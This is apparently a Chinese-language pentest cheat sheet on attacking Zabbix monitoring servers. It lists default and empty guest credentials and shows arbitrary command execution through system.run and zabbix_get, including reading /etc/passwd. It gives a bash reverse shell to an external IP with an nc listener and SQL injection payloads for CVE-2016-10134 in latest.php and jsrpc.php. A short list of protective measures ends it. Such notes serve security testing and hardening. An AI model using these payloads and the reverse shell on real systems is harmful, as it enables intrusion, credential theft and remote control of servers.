1. Zabbix配置不当安全事件
- sohu的zabbix,可导致内网渗透
http://wy.zone.ci/bug_detail.php?wybug_id=wooyun-2015-0127627
- 京东某站shell直入jae内网物理机内核版本过低
http://wy.zone.ci/bug_detail.php?wybug_id=wooyun-2014-086349
2. Zabbix弱口令利用
- zabbix默认的口令为Admin:zabbix,并且存在guest账户密码为空。
- Zabbix server可以远程在agent的机器上执行任意命令
3. 建立监控项
- zabbix_get命令调用
system.run[command,<mode>] # 这个模块是agent自带的,获取服务器shell,获取root权限。
- 反弹提权
bash -i >& /dev/tcp/45.xx.xxx.x1/6666 0>&1
nc -lvp 6666
- zabbix_get命令调用:
zabbix_get -s 172.18.0.4 -k 'system.run[cat /etc/passwd]'
4. Zabbix注入
- latest.php SQL注入漏洞(CVE-2016-10134)
Payload: latest.php?output=ajax&sid=055e1ffa36164a58&favobj=toggle&toggle_open_state=1&toggle_ids[]=updatexml(0,concat(0xa,user()),0
# 用来宾账号的session的后6位 替换链接的sid ,即可通过user() 调用出当前的启动用户
- 直接访问,不需要其他的东西
jsrpc.php? type=0&mode=1&method=screen.get&profileIdx=web.item.graph&resourcetype=17&profileIdx2=updatexml(0,concat(0xa,user()),0)
-
除此之外,还可以使用BurpSuite爆破口令
-
防护措施
- 不要放外网
- 修改默认密码
- 禁用guest 用户
- 不要以root启动
- 401认证
- 备份数据 -> 升级版本
- 做测试找漏洞